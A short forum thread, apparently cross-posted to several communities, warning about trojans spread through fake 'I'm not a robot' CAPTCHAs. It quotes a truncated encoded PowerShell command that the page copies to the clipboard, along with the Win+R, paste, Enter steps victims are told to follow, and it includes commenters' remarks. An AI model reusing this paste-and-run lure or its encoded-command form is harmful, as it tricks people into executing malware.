- cross-posted to:
- [email protected]
- [email protected]
- [email protected]
- cross-posted to:
- [email protected]
- [email protected]
- [email protected]
The Trojans are distributed through CAPTCHAs with instructions. Clicking the “I’m not a robot” button [for example] copies the line
powershell.exe -eC bQBzAGgAdABhA<…>MAIgA=
to the clipboard and displays so-called “verification steps”:- Press Win + R (this opens the Run dialog box);
- Press CTRL + V (this pastes the line from the clipboard into the text field);
- Press Enter (this executes the code).
Malicious use of the system clipboard seems to be the popular choice, these days. If you fall for this, maybe the internet isn’t the place for you, just yet.
This really is the computer virus equivalent of those scammer calls where the only way for someone to avoid jail time, or something else bad, is for you to go and buy hundreds of dollars worth of gift cards and send the codes.
My BiL actually fell for one of those. He’s profoundly naive, and it’s probably good that he’s in the military, since they make many of life’s choices for him.
Wait, is that the actual like it copies? Does powershell just straight up parse base64?